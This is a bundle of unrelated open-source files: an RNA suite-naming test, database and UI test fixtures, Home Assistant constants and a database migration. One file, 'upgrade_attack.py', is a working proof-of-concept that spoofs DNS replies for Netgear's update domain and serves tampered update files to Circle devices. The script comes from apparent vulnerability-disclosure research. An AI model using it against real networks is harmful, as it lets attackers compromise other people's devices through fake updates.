:3g: : : : : Z: 9999.000: 9999.000: 9999.000: 84.000: 195.000: 146.000: 180.000
:3g: : : : : Z: 170.000: 170.000: 52.000: 84.000: 9999.000: 9999.000: 180.000
:1e: : : : : Z: 9999.000: 9999.000: 9999.000: 80.514: 200.545: 280.510: 180.000
:1e: : : : : Z: 249.314: 82.662: 167.890: 85.507: 9999.000: 9999.000: 180.000
:1c: : : : : Z: 9999.000: 9999.000: 9999.000: 80.223: 196.591: 291.299: 180.000
:1c: : : : : Z: 153.060: 194.379: 179.061: 83.648: 9999.000: 9999.000: 180.000
:1f: : : : : Z: 9999.000: 9999.000: 9999.000: 81.395: 203.030: 294.445: 180.000
:1f: : : : : Z: 172.195: 138.540: 175.565: 84.470: 9999.000: 9999.000: 180.000
:5j: : : : : Z: 9999.000: 9999.000: 9999.000: 87.417: 223.558: 80.175: 180.000
:5j: : : : : Z: 66.667: 109.150: 176.475: 83.833: 9999.000: 9999.000: 180.000
:5n: : : : : Z: 9999.000: 9999.000: 9999.000: 86.055: 246.502: 100.392: 180.000
:5n: : : : : Z: 73.595: 213.752: 183.395: 85.483: 9999.000: 9999.000: 180.000
:!!: : : : : Z: 9999.000: 9999.000: 9999.000: 0.000: 0.000: 0.000: 0.000
:!!: : : : : Z: 0.000: 0.000: 0.000: 0.000: 9999.000: 9999.000: 0.000
:1b: : : : : Z: 9999.000: 9999.000: 9999.000: 84.215: 215.014: 288.672: 180.000
:1b: : : : : Z: 300.420: 177.476: 58.307: 144.841: 9999.000: 9999.000: 180.000
:1[: : : : : Z: 9999.000: 9999.000: 9999.000: 82.731: 220.463: 288.665: 180.000
:1[: : : : : Z: 296.983: 221.654: 54.213: 143.771: 9999.000: 9999.000: 180.000
:3b: : : : : Z: 9999.000: 9999.000: 9999.000: 84.700: 226.400: 168.336: 180.000
:3b: : : : : Z: 292.771: 177.629: 48.629: 147.950: 9999.000: 9999.000: 180.000
:1z: : : : : Z: 9999.000: 9999.000: 9999.000: 83.358: 206.042: 277.567: 180.000
:1z: : : : : Z: 195.700: 161.600: 50.750: 145.258: 9999.000: 9999.000: 180.000
:5z: : : : : Z: 9999.000: 9999.000: 9999.000: 82.614: 206.440: 52.524: 180.000
:5z: : : : : Z: 163.669: 148.421: 50.176: 147.590: 9999.000: 9999.000: 180.000
:7p: : : : : Z: 9999.000: 9999.000: 9999.000: 84.285: 236.600: 220.400: 180.000
:7p: : : : : Z: 68.300: 200.122: 53.693: 145.730: 9999.000: 9999.000: 180.000
:5p: : : : : Z: 9999.000: 9999.000: 9999.000: 84.457: 213.286: 69.086: 180.000
:5p: : : : : Z: 75.500: 156.671: 57.486: 147.686: 9999.000: 9999.000: 180.000
:1t: : : : : Z: 9999.000: 9999.000: 9999.000: 81.200: 199.243: 288.986: 180.000
:1t: : : : : Z: 180.286: 194.743: 178.200: 147.386: 9999.000: 9999.000: 180.000
:5q: : : : : Z: 9999.000: 9999.000: 9999.000: 82.133: 204.933: 69.483: 180.000
:5q: : : : : Z: 63.417: 115.233: 176.283: 145.733: 9999.000: 9999.000: 180.000
:1o: : : : : Z: 9999.000: 9999.000: 9999.000: 83.977: 216.508: 287.192: 180.000
:1o: : : : : Z: 297.254: 225.154: 293.738: 150.677: 9999.000: 9999.000: 180.000
:7r: : : : : Z: 9999.000: 9999.000: 9999.000: 84.606: 232.856: 248.125: 180.000
:7r: : : : : Z: 63.269: 181.975: 295.744: 149.744: 9999.000: 9999.000: 180.000
:5r: : : : : Z: 9999.000: 9999.000: 9999.000: 83.000: 196.900: 65.350: 180.000
:5r: : : : : Z: 60.150: 138.425: 292.550: 154.275: 9999.000: 9999.000: 180.000
:2a: : : : : Z: 9999.000: 9999.000: 9999.000: 145.399: 260.339: 288.756: 180.000
:2a: : : : : Z: 288.444: 192.733: 53.097: 84.067: 9999.000: 9999.000: 180.000
:4a: : : : : Z: 9999.000: 9999.000: 9999.000: 146.275: 259.783: 169.958: 180.000
:4a: : : : : Z: 298.450: 169.583: 50.908: 83.967: 9999.000: 9999.000: 180.000
:0a: : : : : Z: 9999.000: 9999.000: 9999.000: 149.286: 223.159: 139.421: 180.000
:0a: : : : : Z: 284.559: 158.107: 47.900: 84.424: 9999.000: 9999.000: 180.000
:#a: : : : : Z: 9999.000: 9999.000: 9999.000: 148.006: 191.944: 146.231: 180.000
:#a: : : : : Z: 289.288: 150.781: 42.419: 84.956: 9999.000: 9999.000: 180.000
:4g: : : : : Z: 9999.000: 9999.000: 9999.000: 148.028: 256.922: 165.194: 180.000
:4g: : : : : Z: 204.961: 165.194: 49.383: 82.983: 9999.000: 9999.000: 180.000
:6g: : : : : Z: 9999.000: 9999.000: 9999.000: 145.337: 262.869: 79.588: 180.000
:6g: : : : : Z: 203.863: 189.688: 58.000: 84.900: 9999.000: 9999.000: 180.000
:8d: : : : : Z: 9999.000: 9999.000: 9999.000: 148.992: 270.596: 240.892: 180.000
:8d: : : : : Z: 62.225: 176.271: 53.600: 87.262: 9999.000: 9999.000: 180.000
:4d: : : : : Z: 9999.000: 9999.000: 9999.000: 149.822: 249.956: 187.678: 180.000
:4d: : : : : Z: 80.433: 198.133: 61.000: 89.378: 9999.000: 9999.000: 180.000
:6d: : : : : Z: 9999.000: 9999.000: 9999.000: 146.922: 241.222: 88.894: 180.000
:6d: : : : : Z: 59.344: 160.683: 52.333: 83.417: 9999.000: 9999.000: 180.000
:2g: : : : : Z: 9999.000: 9999.000: 9999.000: 141.900: 258.383: 286.517: 180.000
:2g: : : : : Z: 178.267: 165.217: 48.350: 84.783: 9999.000: 9999.000: 180.000
:2h: : : : : Z: 9999.000: 9999.000: 9999.000: 147.782: 260.712: 290.424: 180.000
:2h: : : : : Z: 296.200: 177.282: 175.594: 86.565: 9999.000: 9999.000: 180.000
:4n: : : : : Z: 9999.000: 9999.000: 9999.000: 143.722: 227.256: 203.789: 180.000
:4n: : : : : Z: 73.856: 216.733: 194.444: 80.911: 9999.000: 9999.000: 180.000
:0i: : : : : Z: 9999.000: 9999.000: 9999.000: 148.717: 274.683: 100.283: 180.000
:0i: : : : : Z: 80.600: 248.133: 181.817: 82.600: 9999.000: 9999.000: 180.000
:6n: : : : : Z: 9999.000: 9999.000: 9999.000: 150.311: 268.383: 84.972: 180.000
:6n: : : : : Z: 63.811: 191.483: 176.644: 85.600: 9999.000: 9999.000: 180.000
:6j: : : : : Z: 9999.000: 9999.000: 9999.000: 141.633: 244.100: 66.056: 180.000
:6j: : : : : Z: 71.667: 122.167: 182.200: 83.622: 9999.000: 9999.000: 180.000
:0k: : : : : Z: 9999.000: 9999.000: 9999.000: 149.070: 249.780: 111.520: 180.000
:0k: : : : : Z: 278.370: 207.780: 287.820: 86.650: 9999.000: 9999.000: 180.000
:2[: : : : : Z: 9999.000: 9999.000: 9999.000: 146.383: 259.402: 291.275: 180.000
:2[: : : : : Z: 291.982: 210.048: 54.412: 147.760: 9999.000: 9999.000: 180.000
:4b: : : : : Z: 9999.000: 9999.000: 9999.000: 145.256: 244.622: 162.822: 180.000
:4b: : : : : Z: 294.159: 171.630: 45.900: 145.804: 9999.000: 9999.000: 180.000
:0b: : : : : Z: 9999.000: 9999.000: 9999.000: 147.593: 248.421: 112.086: 180.000
:0b: : : : : Z: 274.943: 164.764: 56.843: 146.264: 9999.000: 9999.000: 180.000
:4p: : : : : Z: 9999.000: 9999.000: 9999.000: 150.077: 260.246: 213.785: 180.000
:4p: : : : : Z: 71.900: 207.638: 56.715: 148.131: 9999.000: 9999.000: 180.000
:6p: : : : : Z: 9999.000: 9999.000: 9999.000: 146.415: 257.831: 89.597: 180.000
:6p: : : : : Z: 67.923: 173.051: 55.513: 147.623: 9999.000: 9999.000: 180.000
:2z: : : : : Z: 9999.000: 9999.000: 9999.000: 142.900: 236.550: 268.800: 180.000
:2z: : : : : Z: 180.783: 185.133: 54.467: 143.350: 9999.000: 9999.000: 180.000
:4s: : : : : Z: 9999.000: 9999.000: 9999.000: 149.863: 247.562: 170.488: 180.000
:4s: : : : : Z: 277.938: 84.425: 176.413: 148.087: 9999.000: 9999.000: 180.000
:2u: : : : : Z: 9999.000: 9999.000: 9999.000: 143.940: 258.200: 298.240: 180.000
:2u: : : : : Z: 279.640: 183.680: 183.080: 145.120: 9999.000: 9999.000: 180.000
:2o: : : : : Z: 9999.000: 9999.000: 9999.000: 147.342: 256.475: 295.508: 180.000
:2o: : : : : Z: 287.408: 194.525: 293.725: 150.458: 9999.000: 9999.000: 180.000
:epsilon: : : : : Z: 294.967: 173.990: 53.550: 81.495: 154.000: 288.831: 180.000
:epsilon: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:alpha: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:alpha: : : : : Z: 24.000: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:beta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:beta: : : : : Z: 294.967: 49.000: 53.550: 81.495: 212.250: 288.831: 180.000
:zeta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 24.000: 180.000
:zeta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:delta-1: : : : : Z: 294.967: 173.990: 53.550: 59.000: 212.250: 288.831: 180.000
:delta-1: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:gamma: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:gamma: : : : : Z: 294.967: 173.990: 139.000: 81.495: 212.250: 288.831: 180.000
:delta: : : : : Z: 294.967: 173.990: 53.550: 81.495: 212.250: 288.831: 180.000
:delta: : : : : Z: 294.967: 173.990: 53.550: 59.000: 212.250: 288.831: 180.000
'''
# A manually selected group of test cases from real files,
# designed to exercise each code path through membership(). The first residue of
# each pair has been intentionally damaged so that it does not produce separate
# report output. The causes option is used to show which code path is taken.
input2 = u'''2xLk:1: C: 11: : : G:__?__:__?__:__?__:81.132:-127.583:-70.677
2xLk:1: C: 12: : : U:169.008:153.891:51.391:80.277:-135.347:-70.614
3cgp:1: B: 19: : : U:__?__:__?__:__?__:82.839:-147.528:-179.087
3cgp:1: B: 20: : : A:139.983:-154.445:63.134:88.055:-145.599:70.874
4pco:1: B: 3: : : U:__?__:__?__:__?__:77.659:-165.227:-68.525
4pco:1: B: 4: : : G:151.914:-179.903:176.058:83.039:-148.171:-66.728
5b2q:1: B: 62: : : G:__?__:__?__:__?__:83.537:-131.816:-116.417
5b2q:1: B: 63: : : U:-69.320:-146.615:47.107:147.038:-148.815:45.665
6gc5:1: F: 2: : : U:__?__:__?__:__?__:144.610:-116.227:152.694
6gc5:1: F: 3: : : U:-66.167:162.580:41.697:145.644:-122.673:127.881
3bns:1: A: 21: : : C:__?__:__?__:__?__:76.224:-166.174:-73.594
3bns:1: A: 22: : : G:150.784:-158.788:175.706:87.605:-146.172:-63.516
3gm7:1: H: 5: : : U:__?__:__?__:__?__:68.910:-153.989:-56.381
3gm7:1: H: 6: : : G:-105.747:164.057:92.120:74.597:-150.523:-79.724
6qit:1: A: 2: : : C:__?__:__?__:__?__:82.169:-138.695:-63.417
6qit:1: A: 3: : : A:-71.504:-131.618:54.061:144.409:-95.827:-140.754
3rer:1: K: 7: : : U:__?__:__?__:__?__:87.510:-99.276:-118.108
3rer:1: K: 8: : : A:-66.924:-158.118:48.287:81.250:__?__:__?__
3diL:1: A: 59: : : C:__?__:__?__:__?__:80.668:-145.667:-36.026
3diL:1: A: 60: : : G:-143.441:115.188:149.951:86.379:-141.567:-69.901
5ho4:1: B: 3: : : G:__?__:__?__:__?__:160.213:-123.685:-174.677
5ho4:1: B: 4: : : G:-107.676:163.883:39.081:85.911:-157.392:-71.638
4mcf:1: E: 4: : : U:__?__:__?__:__?__:78.239:-156.881:-70.399
4mcf:1: E: 5: : : G:-91.794:163.594:87.552:70.675:-141.886:-72.556
3pdr:1: A: 59: : : C:__?__:__?__:__?__:80.441:-149.674:-76.690
3pdr:1: A: 60: : : A:-62.415:171.383:47.537:79.461:-145.680:-71.359
3gm7:1: G: 1: : : C:__?__:__?__:__?__:84.065:-128.784:-61.905
3gm7:1: G: 2: : : U:-76.914:-166.398:55.279:74.218:-157.766:-64.720
6h0r:1: B: 15: : : U:__?__:__?__:__?__:83.971:-122.349:-103.636
6h0r:1: B: 16: : : U:-30.804:145.657:33.314:81.109:-141.719:-75.527
2zko:1: C: 13: : : G:__?__:__?__:__?__:76.629:-150.027:-67.298
2zko:1: C: 14: : : C:-70.016:164.567:71.735:76.499:-160.106:-73.474
3pdr:1: X: 138: : : U:__?__:__?__:__?__:77.324:-177.192:-105.412
3pdr:1: X: 139: : : A:-46.950:179.570:49.599:71.442:-143.233:-61.461
4jah:1: B: 10: : : U:__?__:__?__:__?__:85.890:-164.804:-95.055
4jah:1: B: 11: : : G:-64.134:178.767:49.773:77.067:-152.496:-70.128
3diL:1: A: 13: : : C:__?__:__?__:__?__:135.303:-125.074:-69.725
3diL:1: A: 14: : : G:75.452:147.741:32.719:83.048:-146.012:-75.223
3pdr:1: X: 132: : : U:__?__:__?__:__?__:77.469:-157.795:-115.458
3pdr:1: X: 133: : : U:47.309:136.943:-25.259:83.460:-150.210:-61.763
'''
output1='''
:1a: : : : : Z 33 p 1a 1.000
:1m: : : : : Z 33 p 1m 1.000
:1L: : : : : Z 33 p 1L 1.000
:&a: : : : : Z 33 p &a 1.000
:7a: : : : : Z 33 p 7a 1.000
:3a: : : : : Z 33 p 3a 1.000
:9a: : : : : Z 33 p 9a 1.000
:1g: : : : : Z 33 p 1g 1.000
:7d: : : : : Z 33 p 7d 1.000
:3d: : : : : Z 33 p 3d 1.000
:5d: : : : : Z 33 p 5d 1.000
:3g: : : : : Z 33 p 3g 1.000 wannabe
:1e: : : : : Z 33 t 1e 1.000
:1c: : : : : Z 33 t 1c 1.000
:1f: : : : : Z 33 t 1f 1.000
:5j: : : : : Z 33 t 5j 1.000
:5n: : : : : Z 33 t 5n 1.000 wannabe
:!!: : : : : Z trig !! 0.000 epsilon-1
:1b: : : : : Z 32 p 1b 1.000
:1[: : : : : Z 32 p 1[ 1.000
:3b: : : : : Z 32 p 3b 1.000
:1z: : : : : Z 32 p 1z 1.000
:5z: : : : : Z 32 p 5z 1.000
:7p: : : : : Z 32 p 7p 1.000
:5p: : : : : Z 32 p 5p 1.000 wannabe
:1t: : : : : Z 32 t 1t 1.000
:5q: : : : : Z 32 t 5q 1.000
:1o: : : : : Z 32 m 1o 1.000
:7r: : : : : Z 32 m 7r 1.000
:5r: : : : : Z 32 m 5r 1.000 wannabe
:2a: : : : : Z 23 p 2a 1.000
:4a: : : : : Z 23 p 4a 1.000
:0a: : : : : Z 23 p 0a 1.000
:#a: : : : : Z 23 p #a 1.000
:4g: : : : : Z 23 p 4g 1.000
:6g: : : : : Z 23 p 6g 1.000
:8d: : : : : Z 23 p 8d 1.000
:4d: : : : : Z 23 p 4d 1.000
:6d: : : : : Z 23 p 6d 1.000
:2g: : : : : Z 23 p 2g 1.000 wannabe
:2h: : : : : Z 23 t 2h 1.000
:4n: : : : : Z 23 t 4n 1.000
:0i: : : : : Z 23 t 0i 1.000
:6n: : : : : Z 23 t 6n 1.000
:6j: : : : : Z 23 t 6j 1.000
:0k: : : : : Z 23 m 0k 1.000 wannabe
:2[: : : : : Z 22 p 2[ 1.000
:4b: : : : : Z 22 p 4b 1.000
:0b: : : : : Z 22 p 0b 1.000
:4p: : : : : Z 22 p 4p 1.000
:6p: : : : : Z 22 p 6p 1.000
:2z: : : : : Z 22 p 2z 1.000 wannabe
:4s: : : : : Z 22 t 4s 1.000
:2u: : : : : Z 22 t 2u 1.000 wannabe
:2o: : : : : Z 22 m 2o 1.000
:epsilon: : : : : Z trig !! 0.000 epsilon-1
:alpha: : : : : Z 33 p 1a 0.999
:alpha: : : : : Z trig !! 0.000 alpha
:beta: : : : : Z 33 p 1a 0.999
:beta: : : : : Z trig !! 0.000 beta
:zeta: : : : : Z 33 p 1a 0.999
:zeta: : : : : Z trig !! 0.000 zeta-1
:delta-1: : : : : Z trig !! 0.000 delta
:delta-1: : : : : Z trig !! 0.000 delta-1
:gamma: : : : : Z 33 p 1a 0.999
:gamma: : : : : Z trig !! 0.000 gamma
:delta: : : : : Z 33 p 1a 0.999
:delta: : : : : Z trig !! 0.000 delta
'''
output2 = '''2xLk:1: C: 12: : : U 33 p 1g 0.839 1-only-one
3cgp:1: B: 20: : : A 33 p 3g 0.040 1-only-one wannabe
4pco:1: B: 4: : : G 33 t 1c 0.890 2-BETWEEN-dom-sat( 0.22| 0.913)
5b2q:1: B: 63: : : U 32 p 1[ 0.072 2-BETWEEN-dom-sat( 0.941| 0.829)
6gc5:1: F: 3: : : U 22 p 4b 0.889 2-None-dom
3bns:1: A: 22: : : G 33 t 1c 0.901 2-OUTSIDE-dom
3gm7:1: H: 6: : : G 33 p !! 0.000 7D dist 1a
6qit:1: A: 3: : : A 32 p 1[ 0.899 2-OUTSIDE-sat
3rer:1: K: 8: : : A 33 p 7a 0.047 2-None-dom
3diL:1: A: 60: : : G 33 t !! 0.000 7D dist 1e
5ho4:1: B: 4: : : G 23 p !! 0.000 7D dist 4a
4mcf:1: E: 5: : : G 33 p !! 0.000 7D dist 1a
3pdr:1: A: 60: : : A 33 p 1a 0.916 4-BETWEEN-dom-sat( 0.1| 1.2)
3gm7:1: G: 2: : : U 33 p 1a 0.589 4-BETWEEN-dom-sat( 0.428| 0.904)
6h0r:1: B: 16: : : U 33 p 1L 0.033 4-BETWEEN-dom-sat( 0.862| 0.655)
2zko:1: C: 14: : : C 33 p 1a 0.444 4-OUTSIDE-dom
3pdr:1: X: 139: : : A 33 p &a 0.555 4-OUTSIDE-sat
4jah:1: B: 11: : : G 33 p &a 0.912 5-BETWEEN-dom-sat( 0.442| 0.226)
3diL:1: A: 14: : : G 23 p !! 0.000 outlier distance 1.01
3pdr:1: X: 133: : : U 33 m !! 0.000 vacant bin
'''
def test(input, canonicalOutput, options, identity):
opt = suites.parseOptions(options)
stream = StringIO(input)
outFile=StringIO()
suitename.clearStats()
suitename.main(stream, outFile=outFile, optionsIn=opt)
suitename.clearStats()
output = outFile.getvalue()
assert output.strip() == canonicalOutput.strip(), identity
def testAll():
test(input1, output1, "chart=true noinc=true", "cluster and triage test")
test(input2, output2, "chart=true noinc=true causes=true",
"code paths test")
test(regression.in_1ehz, regression.out_1ehz, "", "1ehz regression test")
# Not normally used, but useful for diagnosing failures
def testVerbose(input, canonicalOutput, options, identity):
opt = suites.parseOptions(options)
stream = StringIO(input)
outFile=StringIO("")
suitename.clearStats()
suitename.main(stream, outFile=outFile, optionsIn=opt)
output = outFile.getvalue()
if output.strip() == canonicalOutput.strip():
result = True
sys.stderr.write("Success\n")
else:
result = False
sys.stderr.write("Failed\n")
sys.stderr.write("========================================\n")
sys.stderr.write(canonicalOutput.strip())
sys.stderr.write("\n\n=========================================\n")
sys.stderr.write(output.strip())
out2 = open("UnitTest-output.txt", "w")
out2.write(output.strip())
out2.close()
return result
testAll()
|
test/correctness/conftest.py | kolesa-team/fdb-document-layer | 176 | 12664196 | #!/usr/bin/python
#
# conftest.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2019 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# MongoDB is a registered trademark of MongoDB, Inc.
#
import pytest
import pymongo
import random
import log
logger = log.setup_logger(__name__)
def pytest_addoption(parser):
parser.addoption('--doclayer-port', action='store', default=27018, help="Port that Doc Layer is listening on")
@pytest.yield_fixture(scope='session')
def fixture_client(request):
port = request.config.getoption('--doclayer-port')
client = pymongo.MongoClient('127.0.0.1:{}'.format(port))
yield client
@pytest.yield_fixture(scope='session')
def fixture_db(fixture_client):
db_name = 'db_{}'.format(random.getrandbits(64))
db = fixture_client[db_name]
yield db
fixture_client.drop_database(db_name)
@pytest.yield_fixture(scope='function')
def fixture_collection(fixture_db):
coll_name = 'coll_{}'.format(random.getrandbits(64))
collection = fixture_db[coll_name] # type: pymongo.collection
yield collection
collection.drop()
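
# Example (sketch) of a test that consumes these fixtures; pytest injects them
# by argument name, and the collection is dropped again after the test runs:
#
#   def test_insert_and_find_roundtrip(fixture_collection):
#       fixture_collection.insert_one({'_id': 1, 'value': 'hello'})
#       assert fixture_collection.find_one({'_id': 1})['value'] == 'hello'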
|
2021.09.21-netgear-circle/upgrade_attack.py | bbhunter/NotQuite0DayFriday | 756 | 12664202 | #!/usr/bin/env python
from multiprocessing import Process
from time import sleep
import argparse
import http.server
import re
import socketserver
import socket
from scapy.all import *
def build_dns_response(query, name):
ip = query[IP]
udp = query[UDP]
dns = query[DNS]
dns_answer = DNSRR(rrname=name, type='A', rclass='IN', ttl=5, rdata=server_ip)
response = IP(src=ip.dst, dst=ip.src)
response /= UDP(sport=udp.dport, dport=udp.sport)
response /= DNS(id=dns.id, qr=1, aa=0, qdcount=1, ancount=1, qd=dns.qd, an=dns_answer)
return response
def parse_dns_query(pkt):
if DNSRR in pkt:
name = pkt[DNSRR].rrname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Response for "{name}" from {pkt[IP].src}')
elif DNSQR in pkt:
name = pkt[DNSQR].qname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Query for "{name}" from {pkt[IP].src}')
for update_domain in update_domains:
if name.startswith(update_domain):
dns_response = build_dns_response(pkt, name)
send(dns_response, iface=sniff_iface)
print(f'[+] Target DNS Query responded to with {server_ip}')
def udp_callback(pkt):
if IP not in pkt or UDP not in pkt:
return
udp = pkt[UDP]
try:
if udp.dport == 53 or udp.sport == 53:
parse_dns_query(pkt)
except Exception as e:
print(f'[!] Packet caused exception: {str(e)}')
print(f' {pkt.summary()}')
class CustomHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# strip extra params for pattern matching
if '?' in self.path:
path = self.path[:self.path.find('?')]
else:
path = self.path
if path.endswith('database.tar.gz'):
# serve our copy of the circleinfo.txt file with the malicious info
self.path = './database_pwn.tar.gz'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
elif path.endswith('circleinfo.txt'):
# serve our copy of the circleinfo.txt file with the malicious info
self.path = './circleinfo_pwn.txt'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
else:
# Respond to all other requests with a 404
self.send_response(404)
self.end_headers()
return
def serve_http_thread(server_ip, http_port):
http_address = (server_ip, http_port)
custom_http_server = socketserver.TCPServer(http_address, CustomHttpRequestHandler)
print(f'Serving HTTP at {server_ip} on port {http_port}...')
try:
while True:
custom_http_server.handle_request()
except KeyboardInterrupt:
pass
print('HTTP server stopped.')
if __name__ == "__main__":
parser = argparse.ArgumentParser('upgrade_attack.py', description='Proof of concept MitM on Circle upgrade')
parser.add_argument('interface', help='Interface to sniff/send on')
parser.add_argument('ip_address', help='IP to serve fake update on')
args = parser.parse_args()
sniff_iface = args.interface
server_ip = args.ip_address
http_port = 80
# The typical update domains
update_domains = ['http.updates1.netgear.com']
http_child = Process(target=serve_http_thread, args=(server_ip, http_port))
http_child.start()
# Let the HTTP server start up first
sleep(1)
if not http_child.is_alive():
print('Error: HTTP server failed to start correctly, quitting...')
exit(-1)
# Removes extra scapy logging on send()
conf.verb = False
print(f'Sniffing for upgrade traffic on interface {sniff_iface}, Press CTRL+C to stop...')
try:
sniff(iface=sniff_iface, prn=udp_callback, filter="udp", store=False)
except Scapy_Exception as e:
print(f'Scapy Exception occurred: {str(e)}')
print(f'Error: Sniffing failed, check you\'re on the right interface and run with sudo.')
http_child.terminate()
http_child.join()
print('Done.')
|
backend/r2dec/mdec-r2dec/mdecr2dec/__main__.py | clayne/mdec | 317 | 12664265 | from mdecr2dec import R2decService
from mdecbase import mdec_main
if __name__ == '__main__':
mdec_main(R2decService)
|
tests/mock_objects.py | JPTIZ/asciimatics | 3,197 | 12664288 | from asciimatics.effects import Effect
from asciimatics.exceptions import StopApplication, NextScene
class MockEffect(Effect):
"""
    Dummy Effect used in some UTs.
"""
def __init__(self, count=10, stop=True, swallow=False, next_scene=None,
frame_rate=1, stop_frame=5, **kwargs):
"""
:param count: When to stop effect
:param stop: Whether to stop the application or skip to next scene.
:param swallow: Whether to swallow any events or not.
:param next_scene: The next scene to move to (if stop=False)
:param frame_rate: The frame rate for updates.
"""
super(MockEffect, self).__init__(None, **kwargs)
self.stop_called = False
self.reset_called = False
self.event_called = False
self.save_called = False
self.update_called = False
self._count = count
self._stop = stop
self._swallow = swallow
self._next_scene = next_scene
self._frame_rate = frame_rate
# Ugly hack to stop clash with underlying Effect definition. Sorry.
self._my_stop_frame = stop_frame
@property
def stop_frame(self):
self.stop_called = True
return self._my_stop_frame
@property
def frame_update_count(self):
return self._frame_rate
def _update(self, frame_no):
self.update_called = True
self._count -= 1
if self._count <= 0:
if self._stop:
raise StopApplication("End of test")
else:
raise NextScene(self._next_scene)
def reset(self):
self.reset_called = True
def process_event(self, event):
self.event_called = True
return None if self._swallow else event
def save(self):
self.save_called = True
|
homeassistant/components/eq3btsmart/const.py | MrDelik/core | 30,023 | 12664295 | """Constants for EQ3 Bluetooth Smart Radiator Valves."""
PRESET_PERMANENT_HOLD = "permanent_hold"
PRESET_NO_HOLD = "no_hold"
PRESET_OPEN = "open"
PRESET_CLOSED = "closed"
|
alembic/versions/3bc50ecd0bb_add_generic_id_support.py | bigblue/pynab | 161 | 12664296 | """add generic id support
Revision ID: 3bc50ecd0bb
Revises: <PASSWORD>
Create Date: 2015-10-28 19:25:26.378971
"""
# chunk size to process tv/movies
PROCESS_CHUNK_SIZE = 5000
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '30688404cda'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.schema import Sequence, CreateSequence, MetaData
import config
meta = MetaData()
def upgrade():
### commands auto generated by Alembic - please adjust! ###
dbid = op.create_table('dbids',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('db_id', sa.String(length=50), nullable=True),
sa.Column('db', sa.Enum('TVRAGE', 'TVMAZE', 'OMDB', 'IMDB', name='enum_dbid_name'), nullable=True),
sa.Column('tvshow_id', sa.Integer(), nullable=True),
sa.Column('movie_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id'),
mysql_charset='utf8',
mysql_engine='InnoDB',
mysql_row_format='DYNAMIC'
)
op.create_index('idx_db_id_db', 'dbids', ['db_id', 'db'], unique=False)
op.create_index(op.f('ix_dbids_movie_id'), 'dbids', ['movie_id'], unique=False)
op.create_index(op.f('ix_dbids_tvshow_id'), 'dbids', ['tvshow_id'], unique=False)
bind = op.get_bind()
i = 0
releases = sa.Table('releases', meta, autoload=True, autoload_with=bind)
movies = sa.Table('movies', meta, autoload=True, autoload_with=bind)
tvshows = sa.Table('tvshows', meta, autoload=True, autoload_with=bind)
episodes = sa.Table('episodes', meta, autoload=True, autoload_with=bind)
op.drop_constraint('releases_movie_id_fkey', 'releases')
op.drop_constraint('releases_tvshow_id_fkey', 'releases')
op.drop_constraint('episodes_tvshow_id_fkey', 'episodes')
print('Starting ID conversion.')
for show in bind.execute(tvshows.select().order_by(tvshows.c.id)):
# Small chance that the new id might conflict with an existing
# id. If so just increment and try again.
new_id_ok = False
while not new_id_ok:
if bind.execute(tvshows.select(tvshows.c.id == i)).first():
print('Found dupe id, incrementing new id')
i += 1
else:
new_id_ok = True
try:
print('TVRAGE: {} ({}) -> {}'.format(show[tvshows.c.name], show[tvshows.c.id], i))
except:
# it's just for show, it doesn't matter
pass
bind.execute(dbid.insert().values(
id=i,
db='TVRAGE',
db_id=show[tvshows.c.id],
tvshow_id=i
))
bind.execute(releases.update().where(releases.c.tvshow_id==show[tvshows.c.id]).values(tvshow_id=i))
bind.execute(episodes.update().where(episodes.c.tvshow_id==show[tvshows.c.id]).values(tvshow_id=i))
bind.execute(tvshows.update().where(tvshows.c.id==show[tvshows.c.id]).values(id=i))
i += 1
for movie in bind.execute(movies.select().order_by(movies.c.id)):
# Small chance that the new id might conflict with an existing
# id. If so just increment and try again.
new_id_ok = False
while not new_id_ok:
# movies.id is a character string
if bind.execute(movies.select(movies.c.id == str(i))).first():
print('Found dupe id, incrementing new id')
i += 1
else:
new_id_ok = True
try:
print('IMDB: {} ({}) -> {}'.format(movie[movies.c.name], movie[movies.c.id], i))
except:
pass
bind.execute(dbid.insert().values(
id=i,
db='IMDB',
db_id='tt{}'.format(movie[movies.c.id]),
movie_id=i
))
bind.execute(releases.update().where(releases.c.movie_id==movie[movies.c.id]).values(movie_id=i))
bind.execute(movies.update().where(movies.c.id==movie[movies.c.id]).values(id=i))
i += 1
bind.execute(CreateSequence(Sequence('movies_id_seq', start=i)))
if config.db.get('engine') == 'postgresql':
bind.execute('ALTER TABLE movies ALTER COLUMN id TYPE INTEGER USING id::integer')
bind.execute('ALTER TABLE releases ALTER COLUMN movie_id TYPE INTEGER USING movie_id::integer')
else:
op.alter_column('movies', 'id',
existing_type=sa.VARCHAR(length=20),
type_=sa.Integer(),
existing_nullable=False,
server_default=sa.text('nextval(\'movies_id_seq\'::regclass)')
)
op.alter_column('releases', 'movie_id',
existing_type=sa.VARCHAR(length=20),
type_=sa.Integer(),
existing_nullable=False
)
op.create_foreign_key('releases_movie_id_fkey', 'releases', 'movies', ['movie_id'], ['id'])
